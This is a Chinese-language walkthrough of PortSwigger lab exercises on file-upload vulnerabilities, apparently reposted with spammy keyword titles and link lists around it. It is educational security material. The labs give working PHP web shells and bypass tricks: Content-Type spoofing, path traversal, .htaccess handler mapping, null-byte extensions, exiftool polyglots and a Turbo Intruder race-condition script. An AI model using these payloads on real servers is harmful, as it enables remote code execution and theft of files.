当前位置: 首页 > news >正文

建设的网站别人登录密码建设银行手机银行官方网站下载安装

建设的网站别人登录密码,建设银行手机银行官方网站下载安装,品牌营销推广方案,在哪里建立个人网站burp靶场–文件上传 https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload 1.文件上传 1、原理#xff1a;文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统#xff0c;而不充分验证文件的名称、类型、…burp靶场–文件上传 https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload 1.文件上传 1、原理文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统而不充分验证文件的名称、类型、内容或大小等内容。如果不能正确地执行这些限制可能意味着即使是基本的图像上传功能也可以用来上传任意的和潜在危险的文件。这甚至可以包括支持远程代码执行的服务器端脚本文件 2、危害在某些情况下上传文件的行为本身就足以造成损害。其他攻击可能涉及对文件的后续HTTP请求通常是为了触发服务器执行该文件实验1:通过Webshell上传远程执行代码 ### 实验要求 该实验室包含一个存在漏洞的图像上传功能。在将用户上传的文件存储到服务器的文件系统之前它不会对它们执行任何验证。 要完成该实验请上传一个基本的 PHP Web shell 并使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。 您可以使用以下凭据登录您自己的帐户wiener:peter### 实验操作 通过 Burp 代理流量时登录您的帐户并注意上传头像图像的选项。 上传任意图像然后返回您的帐户页面。请注意您的头像的预览现在显示在页面上。 在 Burp 中转到代理 HTTP 历史记录。单击过滤器栏可打开“过滤器设置”对话框。在“按 MIME 类型过滤”下启用“图像”复选框然后应用更改。 在代理历史记录中请注意您的图像是使用GET请求获取的/files/avatars/YOUR-IMAGE。将此请求发送到 Burp Repeater。 在您的系统上创建一个名为 的文件exploit.php其中包含用于获取卡洛斯秘密文件内容的脚本。例如 ?php echo file_get_contents(/home/carlos/secret); ? 使用头像上传功能上传恶意PHP文件。响应中的消息确认已成功上传。 在 Burp Repeater 中更改请求的路径以指向您的 PHP 文件 GET /files/avatars/exploit.php HTTP/1.1 发送请求。请注意服务器已执行您的脚本并在响应中返回其输出卡洛斯的秘密。 提交解决实验室问题的秘密。实验2:通过绕过 Content-Type 限制上传 Webshell ### 实验要求 该实验室包含一个存在漏洞的图像上传功能。它尝试阻止用户上传意外的文件类型但依赖于检查用户可控的输入来验证这一点。 要完成该实验请上传一个基本的 PHP Web shell 并使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。 您可以使用以下凭据登录您自己的帐户wiener:peter### 实验操作 登录并上传图像作为您的头像然后返回您的帐户页面。 在 Burp 中转到代理 HTTP 历史记录您会注意到您的图像是GET使用/files/avatars/YOUR-IMAGE. 将此请求发送到 Burp Repeater。 在您的系统上创建一个名为 的文件exploit.php其中包含用于获取 Carlos 秘密内容的脚本。例如 ?php echo file_get_contents(/home/carlos/secret); ? 尝试上传此脚本作为您的头像。响应表明您只能上传 MIME 类型image/jpeg或image/png. 在 Burp 中返回代理历史记录并找到POST /my-account/avatar用于提交文件上传的请求。将其发送到 Burp Repeater。 在 Burp Repeater 中转到包含POST /my-account/avatar请求的选项卡。在消息正文中与您的文件相关的部分将指定更改Content-Type为image/jpeg. 发送请求。请注意响应表明您的文件已成功上传。 切换到包含请求的另一个中继器选项卡GET /files/avatars/YOUR-IMAGE。在路径中将图像文件的名称替换为exploit.php并发送请求。请注意响应中返回了 Carlos 的秘密。 提交解决实验室问题的秘密。提交flag完成实验。 实验3:Webshell通过路径遍历上传 【文件名使用路径遍历绕过了上传目录不执行限制】 ### 实验要求 该实验室包含一个存在漏洞的图像上传功能。服务器被配置为阻止执行用户提供的文件但可以通过利用第二个漏洞来绕过此限制。 要完成该实验请上传一个基本的 PHP Web shell 并使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。 您可以使用以下凭据登录您自己的帐户wiener:peter### 实验操作 登录并上传图像作为您的头像然后返回您的帐户页面。 在 Burp 中转到代理 HTTP 历史记录您会注意到您的图像是GET使用/files/avatars/YOUR-IMAGE. 将此请求发送到 Burp Repeater。 在您的系统上创建一个名为 的文件exploit.php其中包含用于获取 Carlos 秘密内容的脚本。例如?php echo file_get_contents(/home/carlos/secret); ? 上传此脚本作为您的头像。请注意该网站似乎并没有阻止您上传 PHP 文件。 在 Burp Repeater 中转到包含GET /files/avatars/YOUR-IMAGE请求的选项卡。在路径中将图像文件的名称替换为exploit.php并发送请求。请注意服务器只是以纯文本形式返回 PHP 文件的内容而不是执行脚本并返回输出。 在Burp的代理历史记录中找到POST /my-account/avatar用于提交文件上传的请求并将其发送到Burp Repeater。 在 Burp Repeater 中转到包含POST /my-account/avatar请求的选项卡找到请求正文中与 PHP 文件相关的部分。在Content-Disposition标头中更改filename以包含目录遍历序列Content-Disposition: form-data; nameavatar; filename../exploit.php 发送请求。请注意响应显示The file avatars/exploit.php has been uploaded.这表明服务器正在从文件名中删除目录遍历序列。 通过对正斜杠 ( ) 字符进行 URL 编码来混淆目录遍历序列/结果是filename..%2fexploit.php 发送请求并观察消息现在显示The file avatars/../exploit.php has been uploaded.“这表明服务器正在对文件名进行 URL 解码”。 在浏览器中返回您的帐户页面。 在 Burp 的代理历史记录中找到该GET /files/avatars/..%2fexploit.php请求。请注意响应中返回了 Carlos 的秘密。这表明该文件已上传到文件系统层次结构中的更高目录 ( /files)并随后由服务器执行。请注意这意味着您还可以使用 请求此文件GET /files/exploit.php。 提交解决实验室问题的秘密。实验4:通过扩展程序黑名单绕过Webshell上传 ### 实验要求 该实验室包含一个存在漏洞的图像上传功能。某些文件扩展名被列入黑名单但由于此黑名单配置中存在根本缺陷因此可以绕过此防御。 要解决该实验请上传一个基本的 PHP Web shell然后使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。 您可以使用以下凭据登录您自己的帐户wiener:peter### 实验操作 登录并上传图像作为您的头像然后返回您的帐户页面。 在 Burp 中转到代理 HTTP 历史记录您会注意到您的图像是GET使用/files/avatars/YOUR-IMAGE. 将此请求发送到 Burp Repeater。 在您的系统上创建一个名为 的文件exploit.php其中包含用于获取卡洛斯秘密内容的脚本。例如?php echo file_get_contents(/home/carlos/secret); ? 尝试上传此脚本作为您的头像。该响应表明您不允许上传带有.php扩展名的文件。 在 Burp 的代理历史记录中找到POST /my-account/avatar用于提交文件上传的请求。在响应中请注意标头显示您正在与 Apache 服务器通信。将此请求发送到 Burp Repeater。 在 Burp Repeater 中转到请求选项卡POST /my-account/avatar并找到与 PHP 文件相关的正文部分。进行以下更改 将参数值更改filename为.htaccess。 将标头的值更改Content-Type为text/plain。 将文件的内容您的 PHP 负载替换为以下 Apache 指令AddType application/x-httpd-php .l33t 这将任意扩展名 ( .l33t) 映射到可执行 MIME 类型application/x-httpd-php。当服务器使用该mod_php模块时它已经知道如何处理这个问题。发送请求并观察文件已成功上传。 使用 Burp Repeater 中的后退箭头返回到上传 PHP 漏洞的原始请求。 将参数值filename从更改exploit.php为exploit.l33t。再次发送请求发现文件已成功上传。 切换到包含请求的另一个中继器选项卡GET /files/avatars/YOUR-IMAGE。在路径中将图像文件的名称替换为exploit.l33t并发送请求。请注意响应中返回了 Carlos 的秘密。由于我们的恶意.htaccess文件该.l33t文件就像一个.php文件一样被执行。 提交解决实验室问题的秘密。上传.htaccess文件 实验5:通过混淆的文件扩展名上传 Webshell ### 实验要求 该实验室包含一个存在漏洞的图像上传功能。某些文件扩展名被列入黑名单但可以使用经典的混淆技术绕过这种防御。 要解决该实验请上传一个基本的 PHP Web shell然后使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。 您可以使用以下凭据登录您自己的帐户wiener:peter### 实验操作 登录并上传图像作为您的头像然后返回您的帐户页面。 在 Burp 中转到代理 HTTP 历史记录您会注意到您的图像是GET使用/files/avatars/YOUR-IMAGE. 将此请求发送到 Burp Repeater。 在您的系统上创建一个名为 的文件exploit.php其中包含用于获取 Carlos 秘密内容的脚本。例如?php echo file_get_contents(/home/carlos/secret); ? 尝试上传此脚本作为您的头像。响应表明您只能上传 JPG 和 PNG 文件。 在 Burp 的代理历史记录中找到POST /my-account/avatar用于提交文件上传的请求。将其发送到 Burp Repeater。 在 Burp Repeater 中转到请求选项卡POST /my-account/avatar并找到与 PHP 文件相关的正文部分。在Content-Disposition标头中更改参数的值filename以包含 URL 编码的空字节后跟.jpg扩展名filenameexploit.php%00.jpg 发送请求并观察文件已成功上传。请注意该消息将文件引用为exploit.php表明空字节和.jpg 扩展名已被删除。 切换到包含请求的另一个中继器选项卡GET /files/avatars/YOUR-IMAGE。在路径中将图像文件的名称替换为exploit.php并发送请求。请注意响应中返回了 Carlos 的秘密。 提交解决实验室问题的秘密。 实验6:通过多语言 Webshell 上传远程执行代码【图片马绕过】 ### 实验要求 该实验室包含一个存在漏洞的图像上传功能。尽管它会检查文件的内容以验证它是否是真实图像但仍然可以上传并执行服务器端代码。 要解决该实验请上传一个基本的 PHP Web shell然后使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。 您可以使用以下凭据登录您自己的帐户wiener:peter### 实验操作 在您的系统上创建一个名为 的文件exploit.php其中包含用于获取卡洛斯秘密内容的脚本。例如?php echo file_get_contents(/home/carlos/secret); ? 登录并尝试将脚本上传为您的头像。请注意即使您尝试使用在之前的实验中学到的一些技术服务器也会成功阻止您上传非图像文件。 创建一个多语言 PHP/JPG 文件该文件本质上是一个普通图像但在其元数据中包含您的 PHP 负载。执行此操作的一个简单方法是从命令行下载并运行 ExifTool如下所示exiftool -Comment?php echo START . file_get_contents(/home/carlos/secret) . END; ? YOUR-INPUT-IMAGE.jpg -o polyglot.php 这会将您的 PHP 有效负载添加到图像的Comment字段中然后使用扩展名保存图像.php。在浏览器中上传多语言图像作为您的头像然后返回您的帐户页面。 在 Burp 的代理历史记录中找到该GET /files/avatars/polyglot.php请求。START使用消息编辑器的搜索功能在响应中的二进制图像数据中查找字符串。在此和END字符串之间您应该看到卡洛斯的秘密例如START 2B2tlPyJQfJDynyKME5D02Cw0ouydMpZ END 提交解决实验室问题的秘密。 上传 实验7:通过竞争条件上传 Webshell ### 实验要求 该实验室包含一个存在漏洞的图像上传功能。尽管它对上传的任何文件执行强大的验证但可以通过在处理文件的方式中利用竞争条件来完全绕过此验证。 要解决该实验请上传一个基本的 PHP Web shell然后使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。 您可以使用以下凭据登录您自己的帐户wiener:peter### 实验操作 登录并上传图像作为您的头像然后返回您的帐户页面。 在 Burp 中转到代理 HTTP 历史记录您会注意到您的图像是GET使用/files/avatars/YOUR-IMAGE. 在您的系统上创建一个名为 的文件exploit.php其中包含用于获取卡洛斯秘密内容的脚本。例如?php echo file_get_contents(/home/carlos/secret); ? 登录并尝试将脚本上传为您的头像。请注意即使您尝试使用在之前的实验中学到的一些技术服务器似乎也成功阻止您上传非图像文件。 如果您尚未从 BApp 商店 将Turbo Intruder扩展添加到 Burp请添加该扩展。 右键单击POST /my-account/avatar用于提交文件上传的请求然后选择扩展 Turbo Intruder 发送到 Turbo Intruder。涡轮入侵者窗口打开。 将以下脚本模板复制并粘贴到 Turbo Intruder 的 Python 编辑器中def queueRequests(target, wordlists):engine RequestEngine(endpointtarget.endpoint, concurrentConnections10,)request1 YOUR-POST-REQUESTrequest2 YOUR-GET-REQUEST# the gate argument blocks the final byte of each request until openGate is invokedengine.queue(request1, gaterace1)for x in range(5):engine.queue(request2, gaterace1)# wait until every race1 tagged request is ready# then send the final byte of each request# (this method is non-blocking, just like queue)engine.openGate(race1)engine.complete(timeout60)def handleResponse(req, interesting):table.add(req) 在脚本中替换为包含您的文件的YOUR-POST-REQUEST整个请求。您可以从 Turbo Intruder 窗口顶部复制并粘贴此内容。 POST /my-account/avatarexploit.php 替换为获取上传的 PHP 文件的请求YOUR-GET-REQUEST。GET最简单的方法是从代理历史记录中复制请求GET /files/avatars/YOUR-IMAGE然后将路径中的文件名更改为exploit.php. 在 Turbo Intruder 窗口的底部单击Attack。该脚本将提交一个POST上传exploit.php文件的请求随后立即GET向/files/avatars/exploit.php. 在结果列表中请注意某些GET请求收到了包含 Carlos 秘密的 200 响应。这些请求在 PHP 文件上传之后、验证失败并被删除之前到达服务器。 提交解决实验室问题的秘密。 笔记 如果您选择手动构建GET请求请确保使用\r\n\r\n序列正确终止它。另请记住Python 将保留多行字符串中的所有空格因此您需要相应地调整缩进以确保发送有效的请求。将请求报文发送到intruder repeater模块手动上传重放包同时观察intruder发现690包就已经收到代码执行的结果了 而且可以看到在690-727这个请求包的时间段内是正常访问了恶意代码的 竞态上传另一种方法使用turbo Intruder插件 先到burp商店安装 在turbo intruder窗口中粘贴以下脚本 def queueRequests(target, wordlists):engine RequestEngine(endpointtarget.endpoint, concurrentConnections10,)request1 YOUR-POST-REQUESTrequest2 YOUR-GET-REQUEST# the gate argument blocks the final byte of each request until openGate is invokedengine.queue(request1, gaterace1)for x in range(5):engine.queue(request2, gaterace1)# wait until every race1 tagged request is ready# then send the final byte of each request# (this method is non-blocking, just like queue)engine.openGate(race1)engine.complete(timeout60)def handleResponse(req, interesting):table.add(req) 点击攻击后查看状态码200的响应包。 其他情况的文件上传 1、上传恶意客户端脚本 1、虽然可能无法在服务器上执行脚本但仍然可以上载脚本以进行客户端攻击。如果可以上载HTML文件或SVG图像则可以使用script标记创建存储的XSS有效负载。————2、如果上载的文件随后出现在其他用户访问的页面上则他们的浏览器将在尝试呈现该页面时执行该脚本由于同源策略限制这些类型的攻击只有在上载文件来自与上载文件相同的源时才会起作用2、利用上载文件解析中的漏洞 1、如果上传的文件看起来存储和提供都很安全那么最后的办法就是尝试利用解析或处理不同文件格式时特有的漏洞————2、如知道服务器解析基于XML的文件如MicrosoftOffice文件或. xls文件这可能是潜在的XXE注射液攻击。 3、使用PUT上载文件 值得注意的是一些web服务器可能被配置为支持PUT请求。如果没有适当的防御措施这可能会提供上传恶意文件的替代方法即使无法通过Web界面使用上传功能。PUT /images/1.php HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-httpd-php Content-Length: 49?php echo file_get_contents(/path/to/file); ? 参考 ### portswigger官方文件上传 https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ### 【Burp系列】超全文件上传漏洞实验 https://mp.weixin.qq.com/s/yQ4UOsQMRwVr2Fb5lvYLQA ### PayloadsAllTheThings 文件上传 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files ### owasp文件上传 https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/08-Test_Upload_of_Unexpected_File_Types https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files
http://www.dnsts.com.cn/news/25809.html

相关文章:

  • 坂田网站建设哪家好360手机优化大师下载
  • 网站建设服务亮点程序员怎么用wordpress
  • 新开传奇网站刚开一秒第一区手机网站的后台管理
  • 凡科网的网站免费的可以用吗东莞哪种网站推广好
  • 深圳移动官网网站建设新品上市怎么做宣传推广
  • 工程建设项目在哪个网站查询天津招投标天津建设工程信息网
  • 网站制作百度资源wordpress 分库
  • 信阳哪里做网站公司网站设计报价
  • 百度推广注册魔贝课凡seo课程好吗
  • 网站架设软件新浪短链接生成工具
  • 网站建设价格多少钱作作网站
  • 网站功能需求用什么做设计师值得拥有的设计导航
  • 橱柜网站模板企业vi手册
  • 网站首页制作教程视频企业网站博客上如何推广
  • 网站seo教程wordpress手机端插件
  • 佛山网站优化方法软件dedecms企业网站模板
  • 奇人网站python 手机网站开发
  • 广州海珠网站制网站建设的一般费用
  • 天津网站搜索排名优化建立网站主页注意那些方面
  • 别人帮做的网站怎么修改病句微信怎么开通微商城
  • 最好的在线网页代理seo系统源码
  • 襄阳网站定制阜新小程序 阜新网站建设开发
  • 淘客怎么做自己的网站网站设计步骤及注意事项
  • 网站建设好处zu97自定义图片 wordpress
  • 云虚拟主机怎么建网站百度推广渠道代理
  • 绿色蔬菜网站模板网站空间有哪几种类型
  • 深圳最好的网站开发公司电话wordpress注册教程视频
  • 陕西网站建设软件盒子wordpress
  • 各种网站开发工具服务器租用
  • 河源网站搭建费用做交通招聘的网站